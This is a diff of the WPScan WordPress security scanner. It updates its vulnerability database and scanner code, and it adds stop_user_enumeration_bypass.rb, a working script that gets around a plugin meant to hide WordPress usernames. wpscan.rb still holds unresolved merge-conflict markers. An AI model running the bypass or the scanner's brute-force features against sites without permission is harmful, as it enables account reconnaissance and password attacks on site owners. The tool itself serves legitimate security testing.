<url>http://www.securityfocus.com/bid/57555</url>
<url>http://securitytracker.com/id?1028045</url>
</references>
<type>XSS</type>
<fixed_in>3.5.1</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.4.1">
@@ -409,6 +514,18 @@
<type>REDIRECT</type>
<fixed_in>3.6.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>89577</osvdb>
<cve>2013-0237</cve>
<secunia>51967</secunia>
<url>http://www.securityfocus.com/bid/57555</url>
<url>http://securitytracker.com/id?1028045</url>
</references>
<type>XSS</type>
<fixed_in>3.5.1</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.4">
@@ -466,6 +583,18 @@
<type>REDIRECT</type>
<fixed_in>3.6.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>89577</osvdb>
<cve>2013-0237</cve>
<secunia>51967</secunia>
<url>http://www.securityfocus.com/bid/57555</url>
<url>http://securitytracker.com/id?1028045</url>
</references>
<type>XSS</type>
<fixed_in>3.5.1</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.4-beta4">
@@ -511,6 +640,18 @@
<type>REDIRECT</type>
<fixed_in>3.6.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>89577</osvdb>
<cve>2013-0237</cve>
<secunia>51967</secunia>
<url>http://www.securityfocus.com/bid/57555</url>
<url>http://securitytracker.com/id?1028045</url>
</references>
<type>XSS</type>
<fixed_in>3.5.1</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.3.3">
@@ -549,6 +690,18 @@
<type>REDIRECT</type>
<fixed_in>3.6.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>89577</osvdb>
<cve>2013-0237</cve>
<secunia>51967</secunia>
<url>http://www.securityfocus.com/bid/57555</url>
<url>http://securitytracker.com/id?1028045</url>
</references>
<type>XSS</type>
<fixed_in>3.5.1</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.3.2">
@@ -625,6 +778,18 @@
<type>REDIRECT</type>
<fixed_in>3.6.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Plupload Unspecified XSS</title>
<references>
<osvdb>89577</osvdb>
<cve>2013-0237</cve>
<secunia>51967</secunia>
<url>http://www.securityfocus.com/bid/57555</url>
<url>http://securitytracker.com/id?1028045</url>
</references>
<type>XSS</type>
<fixed_in>3.5.1</fixed_in>
</vulnerability>
</wordpress>
<wordpress version="3.3.1">
@@ -1658,6 +1823,7 @@
<vulnerability>
<title>wp-includes/comment.php bypass intended spam restrictions via a crafted URL</title>
<references>
<osvdb>104693</osvdb>
<cve>2010-5293</cve>
</references>
<type>UNKNOWN</type>
@@ -1792,10 +1958,11 @@
<vulnerability>
<title>When a Multisite installation is used, permanently retains the "site administrators can add users" option once changed, which might allow remote authenticated administrators to bypass intended access restrictions in opportunistic circumstances via an add action after a temporary change.</title>
<references>
<osvdb>104691</osvdb>
<cve>2010-5297</cve>
</references>
<type>AUTHBYPASS</type>
<fixed_in>3.0</fixed_in>
<fixed_in>3.0.1</fixed_in>
</vulnerability>
<vulnerability>
<title>Crafted String URL Redirect Restriction Bypass</title>
@@ -1838,6 +2005,7 @@
<vulnerability>
<title>wp-includes/comment.php bypass intended spam restrictions via a crafted URL</title>
<references>
<osvdb>104693</osvdb>
<cve>2010-5293</cve>
</references>
<type>UNKNOWN</type>

3
lib/common/browser.rb
View File

@@ -23,6 +23,8 @@ class Browser
attr_reader :hydra, :cache_dir
attr_accessor :referer
# @param [ Hash ] options
#
# @return [ Browser ]
@@ -135,6 +137,7 @@ class Browser
)
end
params.merge!(referer: referer)
params.merge!(timeout: @request_timeout) if @request_timeout
params.merge!(connecttimeout: @connect_timeout) if @connect_timeout

9
lib/common/collections/wp_items/detectable.rb
View File

@@ -17,6 +17,7 @@ class WpItems < Array
hydra = browser.hydra
targets = targets_items(wp_target, options)
progress_bar = progress_bar(targets.size, options)
queue_count = 0
exist_options = {
error_404_hash: wp_target.error_404_hash,
homepage_hash: wp_target.homepage_hash,
@@ -43,8 +44,16 @@ class WpItems < Array
end
hydra.queue(request)
queue_count += 1
if queue_count >= browser.max_threads
hydra.run
queue_count = 0
puts "Sent #{browser.max_threads} requests ..." if options[:verbose]
end
end
# run the remaining requests
hydra.run
results.sort!
results # can't just return results.sort because the #sort returns an array, and we want a WpItems

10
lib/common/common_helper.rb
View File

@@ -34,7 +34,7 @@ WP_VERSIONS_XSD = DATA_DIR + '/wp_versions.xsd'
LOCAL_FILES_XSD = DATA_DIR + '/local_vulnerable_files.xsd'
USER_AGENTS_FILE = DATA_DIR + '/user-agents.txt'
WPSCAN_VERSION = '2.3'
WPSCAN_VERSION = '2.4'
$LOAD_PATH.unshift(LIB_DIR)
$LOAD_PATH.unshift(WPSCAN_LIB_DIR)
@@ -64,6 +64,14 @@ end
require_files_from_directory(COMMON_LIB_DIR, '**/*.rb')
# Hook to check if the target if down during the scan
# The target is considered down after 10 requests with status = 0
down = 0
Typhoeus.on_complete do |response|
down += 1 if response.code == 0
fail 'The target seems to be down' if down >= 10
end
# Add protocol
def add_http_protocol(url)
url =~ /^https?:/ ? url : "http://#{url}"

2
lib/common/models/wp_theme/findable.rb
View File

@@ -43,8 +43,6 @@ class WpTheme < WpItem
end
end
# http://code.google.com/p/wpscan/issues/detail?id=141
#
# @param [ URI ] target_uri
#
# @return [ WpTheme ]

6
lib/common/models/wp_user.rb
View File

@@ -12,7 +12,7 @@ class WpUser < WpItem
# @return [ Array<Symbol> ]
def allowed_options; [:id, :login, :display_name, :password] end
# @return [ URI ] The uri to the auhor page
# @return [ URI ] The uri to the author page
def uri
if id
return @uri.merge("?author=#{id}")
@@ -54,8 +54,8 @@ class WpUser < WpItem
# @return [ String ]
def to_s
s = "#{id}"
s += " | #{login}" if login
s += " | #{display_name}" if display_name
s << " | #{login}" if login
s << " | #{display_name}" if display_name
s
end

2
lib/common/models/wp_version/findable.rb
View File

@@ -190,8 +190,6 @@ class WpVersion < WpItem
# Attempts to find the WordPress version from the sitemap.xml file.
#
# See: http://code.google.com/p/wpscan/issues/detail?id=109
#
# @param [ URI ] target_uri
#
# @return [ String ] The version number

4
lib/wpscan/web_site.rb
View File

@@ -32,7 +32,7 @@ class WebSite
def has_xml_rpc?
response = Browser.get_and_follow_location(xml_rpc_url)
response.body =~ %r{XML-RPC server accepts POST requests only}i
response.body =~ %r{XML-RPC server accepts POST requests only}i
end
# See http://www.hixie.ch/specs/pingback/pingback-1.0#TOC2.3
@@ -71,7 +71,7 @@ class WebSite
#
# @return [ String ] The MD5 hash of the page
def self.page_hash(page)
page = Browser.get(page) unless page.is_a?(Typhoeus::Response)
page = Browser.get(page, { followlocation: true, cache_ttl: 0 }) unless page.is_a?(Typhoeus::Response)
Digest::MD5.hexdigest(page.body.gsub(/<!--.*?-->/m, ''))
end

8
lib/wpscan/wp_target.rb
View File

@@ -29,6 +29,7 @@ class WpTarget < WebSite
@multisite = nil
Browser.instance(options.merge(:max_threads => options[:threads]))
Browser.instance.referer = url
end
# check if the target website is
@@ -38,6 +39,11 @@ class WpTarget < WebSite
response = Browser.get_and_follow_location(@uri.to_s)
# Note: in the future major WPScan version, change the user-agent to see
# if the response is a 200 ?
fail "The target is responding with a 403, this might be due to a WAF or a plugin\n" \
'You should try to supply a valid user-agent via the --user-agent option' if response.code == 403
if response.body =~ /["'][^"']*\/wp-content\/[^"']*["']/i
wordpress = true
else
@@ -93,7 +99,7 @@ class WpTarget < WebSite
end
# :nocov:
# The version is not yet considerated
# The version is not yet considered
#
# @param [ String ] name
# @param [ String ] version

1
lib/wpscan/wp_target/wp_login_protection.rb
View File

@@ -12,7 +12,6 @@ class WpTarget < WebSite
end
# Checks if a login protection plugin is enabled
# http://code.google.com/p/wpscan/issues/detail?id=111
# return a WpPlugin object or nil if no one is found
def login_protection_plugin
unless @login_protection_plugin

1
lib/wpscan/wpscan_helper.rb
View File

@@ -101,5 +101,6 @@ def help
puts '--max-threads <max-threads> Maximum Threads'
puts '--help | -h This help screen.'
puts '--verbose | -v Verbose output.'
puts '--batch Never ask for user input, use the default behaviour.'
puts
end

10
lib/wpscan/wpscan_options.rb
View File

@@ -3,6 +3,7 @@
class WpscanOptions
ACCESSOR_OPTIONS = [
:batch,
:enumerate_plugins,
:enumerate_only_vulnerable_plugins,
:enumerate_all_plugins,
@@ -252,10 +253,11 @@ class WpscanOptions
['--basic-auth', GetoptLong::REQUIRED_ARGUMENT],
['--debug-output', GetoptLong::NO_ARGUMENT],
['--version', GetoptLong::NO_ARGUMENT],
['--cache_ttl', GetoptLong::REQUIRED_ARGUMENT],
['--request_timeout', GetoptLong::REQUIRED_ARGUMENT],
['--connect_timeout', GetoptLong::REQUIRED_ARGUMENT],
['--max_threads', GetoptLong::REQUIRED_ARGUMENT]
['--cache-ttl', GetoptLong::REQUIRED_ARGUMENT],
['--request-timeout', GetoptLong::REQUIRED_ARGUMENT],
['--connect-timeout', GetoptLong::REQUIRED_ARGUMENT],
['--max-threads', GetoptLong::REQUIRED_ARGUMENT],
['--batch', GetoptLong::NO_ARGUMENT]
)
end

4
lib/wpstools/plugins/checker/checker_plugin.rb
View File

@@ -32,10 +32,12 @@ class CheckerPlugin < Plugin
xml = xml(vuln_ref_file)
urls = []
xml.xpath('//reference').each { |node| urls << node.text }
xml.xpath('//references/url').each { |node| urls << node.text }
urls.uniq!
puts "[!] No URLs found in #{vuln_ref_file}!" if urls.empty?
dead_urls = []
queue_count = 0
request_count = 0

6
lib/wpstools/plugins/stats/stats_plugin.rb
View File

@@ -20,7 +20,6 @@ class StatsPlugin < Plugin
puts "WPScan Database Statistics:"
puts "---------------------------"
puts "[#] Total WordPress Sites in the World: #{get_wp_installations}"
puts
puts "[#] Total vulnerable versions: #{vuln_core_count}"
puts "[#] Total vulnerable plugins: #{vuln_plugin_count}"
@@ -79,9 +78,4 @@ class StatsPlugin < Plugin
IO.readlines(file).size
end
def get_wp_installations()
page = Nokogiri::HTML(Typhoeus.get('http://en.wordpress.com/stats/').body)
page.css('span[class="stats-flipper-number"]').text
end
end

3
spec/lib/common/browser_spec.rb
View File

@@ -131,7 +131,8 @@ describe Browser do
ssl_verifypeer: false, ssl_verifyhost: 0,
cookiejar: cookie_jar, cookiefile: cookie_jar,
timeout: 2000, connecttimeout: 1000,
maxredirs: 3
maxredirs: 3,
referer: nil
}
}

8
spec/lib/wpscan/wp_target_spec.rb
View File

@@ -97,6 +97,14 @@ describe WpTarget do
wp_target.should_not be_wordpress
end
end
context 'when the response is a 403' do
before { stub_request(:any, /.*/).to_return(status: 403) }
it 'raises an error' do
expect { wp_target.wordpress? }.to raise_error
end
end
end
describe '#wordpress_hosted?' do

1
spec/shared_examples/wp_target/wp_readme.rb
View File

@@ -27,7 +27,6 @@ shared_examples 'WpTarget::WpReadme' do
@expected = true
end
# http://code.google.com/p/wpscan/issues/detail?id=108
it 'returns true even if the readme.html is not in english' do
@stub = { status: 200, body: File.new(fixtures_dir + '/readme-3.3.2-fr.html') }
@expected = true

73
stop_user_enumeration_bypass.rb Executable file
View File

@@ -0,0 +1,73 @@
#!/usr/bin/env ruby
# encoding: UTF-8
#
#
# Script based on http://seclists.org/fulldisclosure/2014/Feb/3
require File.join(File.dirname(__FILE__), 'lib/wpscan/wpscan_helper')
@opts = {
ids: 1..10,
verbose: false,
user_agent: 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0'
}
parser = OptionParser.new('Usage: ./stop_user_enumeration_bypass.rb <Target URL> [options]', 35) do |opts|
opts.on('--proxy PROXY', 'Proxy to use') do |proxy|
@opts[:proxy] = proxy
end
opts.on('--auth Username:Password', 'Credentials to use if Basic/NTLM auth') do |creds|
@opts[:creds] = creds
end
opts.on('--ids START-END', 'The ids to check, default is 1-10') do |ids|
@opts[:ids] = Range.new(*ids.split('-').map(&:to_i))
end
opts.on('--user-agent UA', 'The user-agent to use') do |ua|
@opts[:user_agent] = ua
end
opts.on('--verbose', '-v', 'Verbose Mode') do
@opts[:verbose] = true
end
end
begin
parser.parse!
fail "#{red('The target URL must be supplied')}\n\n#{parser}" unless ARGV[0]
uri = URI.parse(add_trailing_slash(add_http_protocol(ARGV[0])))
request_params = {
proxy: @opts[:proxy],
userpwd: @opts[:creds],
headers: { 'User-Agent' => @opts[:user_agent] },
followlocation: true,
ssl_verifypeer: false,
ssl_verifyhost: 2
}
detected_users = WpUsers.new
@opts[:ids].each do |user_id|
user = WpUser.new(uri, id: user_id)
if user.exists_from_response?(Typhoeus.post(uri, request_params.merge(body: { author: user_id })))
detected_users << user
end
end
puts 'Usernames found:'
detected_users.output
rescue => e
puts e.message
if @opts[:verbose]
puts red('Trace:')
puts red(e.backtrace.join("\n"))
end
exit(1)
end

52
wpscan.rb
View File

@@ -63,12 +63,11 @@ def main
end
end
redirection = wp_target.redirection
if redirection
if (redirection = wp_target.redirection)
if wpscan_options.follow_redirection
puts "Following redirection #{redirection}"
puts
else
<<<<<<< HEAD
puts "#{blue('[i]')} The remote host tried to redirect to: #{redirection}"
print "[?] Do you want follow the redirection ? [y/n] "
end
@@ -79,6 +78,22 @@ def main
else
puts "#{red('[!]')} Scan aborted"
exit(0)
=======
puts "The remote host redirects to: #{redirection}"
puts '[?] Do you want follow the redirection ? [Y]es [N]o [A]bort, default: [N]'
end
if wpscan_options.follow_redirection || !wpscan_options.batch
if wpscan_options.follow_redirection || (input = Readline.readline) =~ /^y/i
wpscan_options.url = redirection
wp_target = WpTarget.new(redirection, wpscan_options.to_h)
else
if input =~ /^a/i
puts 'Scan aborted'
exit(0)
end
end
>>>>>>> master
end
end
@@ -100,8 +115,8 @@ def main
unless wp_target.wp_plugins_dir_exists?
puts "The plugins directory '#{wp_target.wp_plugins_dir}' does not exist."
puts 'You can specify one per command line option (don\'t forget to include the wp-content directory if needed)'
print '[?] Continue? [y/n] '
unless Readline.readline =~ /^y/i
puts '[?] Continue? [Y]es [N]o, default: [N]'
if wpscan_options.batch || Readline.readline !~ /^y/i
exit(0)
end
end
@@ -148,7 +163,7 @@ def main
wp_target.interesting_headers.each do |header|
output = "#{green('[+]')} Interesting header: "
if header[1].class == Array
if header[1].class == Array
header[1].each do |value|
puts output + "#{header[0]}: #{value}"
end
@@ -294,6 +309,11 @@ def main
puts
puts "#{green('[+]')} Enumerating usernames ..."
if wp_target.has_plugin?('stop-user-enumeration')
puts "#{red('[!]')} Stop User Enumeration plugin detected, results might be empty. " \
"However a bypass exists, see stop_user_enumeration_bypass.rb in #{File.expand_path(File.dirname(__FILE__))}"
end
wp_users = WpUsers.aggressive_detection(wp_target,
enum_options.merge(
range: wpscan_options.enumerate_usernames_range,
@@ -328,11 +348,11 @@ def main
puts
puts "#{red('[!]')} The plugin #{protection_plugin.name} has been detected. It might record the IP and timestamp of every failed login and/or prevent brute forcing altogether. Not a good idea for brute forcing!"
print "[?] Do you want to start the brute force anyway ? [y/n] "
puts '[?] Do you want to start the brute force anyway ? [Y]es [N]o, default: [N]'
bruteforce = false if Readline.readline !~ /^y/i
bruteforce = false if wpscan_options.batch || Readline.readline !~ /^y/i
end
puts
if bruteforce
puts "#{green('[+]')} Starting the password brute forcer"
@@ -354,7 +374,7 @@ def main
stop_time = Time.now
elapsed = stop_time - start_time
used_memory = get_memory_usage - start_memory
puts
puts green("[+] Finished: #{stop_time.asctime}")
puts green("[+] Memory used: #{used_memory.bytes_to_human}")
@@ -362,13 +382,13 @@ def main
exit(0) # must exit!
rescue SystemExit, Interrupt
rescue => e
if e.backtrace[0] =~ /main/
puts red(e.message)
else
puts red("[ERROR] #{e.message}")
puts red("Trace:")
puts
puts red(e.message)
if wpscan_options && wpscan_options.verbose
puts red('Trace:')
puts red(e.backtrace.join("\n"))
end
exit(1)